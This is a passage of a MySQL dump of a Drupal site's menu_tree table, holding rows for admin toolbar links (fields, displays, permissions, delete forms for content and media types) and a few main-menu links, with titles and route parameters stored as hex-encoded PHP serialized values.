('admin', 184, 'admin_toolbar_tools.extra_links:entity.block_content.field_ui_fieldsbasic', 'admin_toolbar_tools.extra_links:entity.block_content_type.edit_form.basic', 'entity.block_content.field_ui_fields', 'block_content_type=basic', 0x613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a353a226261736963223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 294, 183, 184, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 185, 'admin_toolbar_tools.extra_links:entity.entity_form_display.block_content.defaultbasic', 'admin_toolbar_tools.extra_links:entity.block_content_type.edit_form.basic', 'entity.entity_form_display.block_content.default', 'block_content_type=basic', 0x613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a353a226261736963223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 294, 183, 185, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 186, 'admin_toolbar_tools.extra_links:entity.entity_view_display.block_content.default.basic', 'admin_toolbar_tools.extra_links:entity.block_content_type.edit_form.basic', 'entity.entity_view_display.block_content.default', 'block_content_type=basic', 0x613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a353a226261736963223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 294, 183, 186, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 187, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.block_content.default.basic', 'admin_toolbar_tools.extra_links:entity.block_content_type.edit_form.basic', 'entity.block_content_type.entity_permissions_form', 'block_content_type=basic', 0x613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a353a226261736963223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 294, 183, 187, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 188, 'admin_toolbar_tools.extra_links:entity.block_content_type.delete_form.basic', 'admin_toolbar_tools.extra_links:entity.block_content_type.edit_form.basic', 'entity.block_content_type.delete_form', 'block_content_type=basic', 0x613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b733a353a226261736963223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 294, 183, 188, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 189, 'we_megamenu.admin', 'system.admin_structure', 'we_megamenu.admin', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a393a224d656761204d656e75223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32333a224c697374204f66204d656761204d656e75204974656d73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'we_megamenu', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 189, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 190, 'at_theme_generator.generate', 'system.themes_page', 'at_theme_generator.generator', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224154205468656d652047656e657261746f72223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'at_theme_generator', 1, 1, 0, 200, 0x613a303a7b7d, 0, 3, 6, 21, 190, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 191, 'admin_toolbar_tools.extra_links:system.theme_settings_theme.new_comet', 'admin_toolbar_tools.extra_links:system.theme_settings', 'system.theme_settings_theme', 'theme=new_comet', 0x613a313a7b733a353a227468656d65223b733a393a226e65775f636f6d6574223b7d, '', 0x733a393a226e65772d636f6d6574223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 21, 154, 191, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 192, 'admin_toolbar_tools.extra_links:entity.menu.edit_form.main-menu', 'entity.menu.collection', 'entity.menu.edit_form', 'menu=main-menu', 0x613a313a7b733a343a226d656e75223b733a393a226d61696e2d6d656e75223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a323a7b733a31313a22656e746974795f74797065223b733a343a226d656e75223b733a393a22656e746974795f6964223b733a393a226d61696e2d6d656e75223b7d, 1, 4, 6, 10, 17, 192, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 193, 'admin_toolbar_tools.extra_links:entity.menu.add_link_form.main-menu', 'admin_toolbar_tools.extra_links:entity.menu.edit_form.main-menu', 'entity.menu.add_link_form', 'menu=main-menu', 0x613a313a7b733a343a226d656e75223b733a393a226d61696e2d6d656e75223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a22416464206c696e6b223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 5, 6, 10, 17, 192, 193, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 194, 'admin_toolbar_tools.extra_links:entity.menu.delete_form.main-menu', 'admin_toolbar_tools.extra_links:entity.menu.edit_form.main-menu', 'entity.menu.delete_form', 'menu=main-menu', 0x613a313a7b733a343a226d656e75223b733a393a226d61696e2d6d656e75223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 17, 192, 194, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('main-menu', 195, 'menu_link_content:8d1e32fe-2b56-44b2-a354-f0328833fc26', '', 'entity.node.canonical', 'node=1', 0x613a313a7b733a343a226e6f6465223b733a313a2231223b7d, '', 0x733a383a2241626f7574205573223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a313a7b733a353a227175657279223b613a303a7b7d7d, 'menu_link_content', 1, 1, 0, -50, 0x613a313a7b733a393a22656e746974795f6964223b733a313a2231223b7d, 1, 1, 195, 0, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm'),
('main-menu', 197, 'menu_link_content:2c1fc4fa-d805-47d6-bcdb-c2e31674f1fd', 'menu_link_content:6bec1422-63fe-47ba-940d-fc00560c2bbe', 'view.activity.page_1', 'view_id=activity&display_id=page_1', 0x613a323a7b733a373a22766965775f6964223b733a383a226163746976697479223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b7d, '', 0x733a31303a2241637469766974696573223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a313a7b733a353a227175657279223b613a303a7b7d7d, 'menu_link_content', 1, 1, 0, -49, 0x613a313a7b733a393a22656e746974795f6964223b733a313a2233223b7d, 0, 2, 305, 197, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm'),
('main-menu', 198, 'menu_link_content:feefe983-d4d7-413d-b359-4d5f9649c0a4', '', 'entity.node.canonical', 'node=11', 0x613a313a7b733a343a226e6f6465223b733a323a223131223b7d, '', 0x733a31303a22436f6e74616374205573223b, NULL, 'Drupal\\menu_link_content\\Plugin\\Menu\\MenuLinkContent', 0x613a313a7b733a353a227175657279223b613a303a7b7d7d, 'menu_link_content', 1, 1, 0, -47, 0x613a313a7b733a393a22656e746974795f6964223b733a313a2234223b7d, 0, 1, 198, 0, 0, 0, 0, 0, 0, 0, 0, '\\Drupal\\menu_link_content\\Form\\MenuLinkContentForm'),
('admin', 199, 'admin_toolbar_tools.extra_links:node.add.announcement', 'admin_toolbar_tools.extra_links:node.add', 'node.add', 'node_type=announcement', 0x613a313a7b733a393a226e6f64655f74797065223b733a31323a22616e6e6f756e63656d656e74223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a226e6f64655f74797065223b733a393a22656e746974795f6964223b733a31323a22616e6e6f756e63656d656e74223b7d, 0, 4, 6, 8, 77, 199, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 200, 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.announcement', 'entity.node_type.collection', 'entity.node_type.edit_form', 'node_type=announcement', 0x613a313a7b733a393a226e6f64655f74797065223b733a31323a22616e6e6f756e63656d656e74223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a226e6f64655f74797065223b733a393a22656e746974795f6964223b733a31323a22616e6e6f756e63656d656e74223b7d, 1, 4, 6, 10, 18, 200, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 201, 'admin_toolbar_tools.extra_links:entity.node.field_ui_fieldsannouncement', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.announcement', 'entity.node.field_ui_fields', 'node_type=announcement', 0x613a313a7b733a393a226e6f64655f74797065223b733a31323a22616e6e6f756e63656d656e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 18, 200, 201, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm');
INSERT INTO `menu_tree` (`menu_name`, `mlid`, `id`, `parent`, `route_name`, `route_param_key`, `route_parameters`, `url`, `title`, `description`, `class`, `options`, `provider`, `enabled`, `discovered`, `expanded`, `weight`, `metadata`, `has_children`, `depth`, `p1`, `p2`, `p3`, `p4`, `p5`, `p6`, `p7`, `p8`, `p9`, `form_class`) VALUES
('admin', 202, 'admin_toolbar_tools.extra_links:entity.entity_form_display.node.defaultannouncement', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.announcement', 'entity.entity_form_display.node.default', 'node_type=announcement', 0x613a313a7b733a393a226e6f64655f74797065223b733a31323a22616e6e6f756e63656d656e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 18, 200, 202, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 203, 'admin_toolbar_tools.extra_links:entity.entity_view_display.node.default.announcement', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.announcement', 'entity.entity_view_display.node.default', 'node_type=announcement', 0x613a313a7b733a393a226e6f64655f74797065223b733a31323a22616e6e6f756e63656d656e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 200, 203, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 204, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.node.default.announcement', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.announcement', 'entity.node_type.entity_permissions_form', 'node_type=announcement', 0x613a313a7b733a393a226e6f64655f74797065223b733a31323a22616e6e6f756e63656d656e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 200, 204, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 205, 'admin_toolbar_tools.extra_links:entity.node_type.delete_form.announcement', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.announcement', 'entity.node_type.delete_form', 'node_type=announcement', 0x613a313a7b733a393a226e6f64655f74797065223b733a31323a22616e6e6f756e63656d656e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 18, 200, 205, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 206, 'admin_toolbar_tools.extra_links:views_ui.announcement', 'entity.view.collection', 'entity.view.edit_form', 'view=announcement', 0x613a313a7b733a343a2276696577223b733a31323a22616e6e6f756e63656d656e74223b7d, '', 0x733a31323a22616e6e6f756e63656d656e74223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 206, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 207, 'admin_toolbar_tools.extra_links:node.add.activities', 'admin_toolbar_tools.extra_links:node.add', 'node.add', 'node_type=activities', 0x613a313a7b733a393a226e6f64655f74797065223b733a31303a2261637469766974696573223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a226e6f64655f74797065223b733a393a22656e746974795f6964223b733a31303a2261637469766974696573223b7d, 0, 4, 6, 8, 77, 207, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 208, 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.activities', 'entity.node_type.collection', 'entity.node_type.edit_form', 'node_type=activities', 0x613a313a7b733a393a226e6f64655f74797065223b733a31303a2261637469766974696573223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a393a226e6f64655f74797065223b733a393a22656e746974795f6964223b733a31303a2261637469766974696573223b7d, 1, 4, 6, 10, 18, 208, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 209, 'admin_toolbar_tools.extra_links:entity.node.field_ui_fieldsactivities', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.activities', 'entity.node.field_ui_fields', 'node_type=activities', 0x613a313a7b733a393a226e6f64655f74797065223b733a31303a2261637469766974696573223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 18, 208, 209, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 210, 'admin_toolbar_tools.extra_links:entity.entity_form_display.node.defaultactivities', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.activities', 'entity.entity_form_display.node.default', 'node_type=activities', 0x613a313a7b733a393a226e6f64655f74797065223b733a31303a2261637469766974696573223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 18, 208, 210, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 211, 'admin_toolbar_tools.extra_links:entity.entity_view_display.node.default.activities', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.activities', 'entity.entity_view_display.node.default', 'node_type=activities', 0x613a313a7b733a393a226e6f64655f74797065223b733a31303a2261637469766974696573223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 208, 211, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 212, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.node.default.activities', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.activities', 'entity.node_type.entity_permissions_form', 'node_type=activities', 0x613a313a7b733a393a226e6f64655f74797065223b733a31303a2261637469766974696573223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 18, 208, 212, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 213, 'admin_toolbar_tools.extra_links:entity.node_type.delete_form.activities', 'admin_toolbar_tools.extra_links:entity.node_type.edit_form.activities', 'entity.node_type.delete_form', 'node_type=activities', 0x613a313a7b733a393a226e6f64655f74797065223b733a31303a2261637469766974696573223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 18, 208, 213, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 214, 'admin_toolbar_tools.extra_links:views_ui.related_blocks', 'entity.view.collection', 'entity.view.edit_form', 'view=related_blocks', 0x613a313a7b733a343a2276696577223b733a31343a2272656c617465645f626c6f636b73223b7d, '', 0x733a31343a2272656c617465642d626c6f636b73223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 214, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 215, 'admin_toolbar_tools.extra_links:views_ui.activity', 'entity.view.collection', 'entity.view.edit_form', 'view=activity', 0x613a313a7b733a343a2276696577223b733a383a226163746976697479223b7d, '', 0x733a383a226163746976697479223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 215, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 216, 'admin_toolbar_tools.extra_links:media_page', 'system.admin_content', 'entity.media.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a224d65646961223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 8, 216, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 217, 'admin_toolbar_tools.extra_links:add_media', 'admin_toolbar_tools.extra_links:media_page', 'entity.media.add_page', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a393a22416464206d65646961223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 1, 4, 6, 8, 216, 217, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 218, 'admin_toolbar_tools.extra_links:media.add.audio', 'admin_toolbar_tools.extra_links:add_media', 'entity.media.add_form', 'media_type=audio', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22617564696f223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31303a226d656469615f74797065223b733a393a22656e746974795f6964223b733a353a22617564696f223b7d, 0, 5, 6, 8, 216, 217, 218, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 219, 'entity.media_type.collection', 'system.admin_structure', 'entity.media_type.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a224d65646961207479706573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e616765206d656469612074797065732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'media', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 219, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 220, 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.audio', 'entity.media_type.collection', 'entity.media_type.edit_form', 'media_type=audio', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22617564696f223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31303a226d656469615f74797065223b733a393a22656e746974795f6964223b733a353a22617564696f223b7d, 1, 4, 6, 10, 219, 220, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
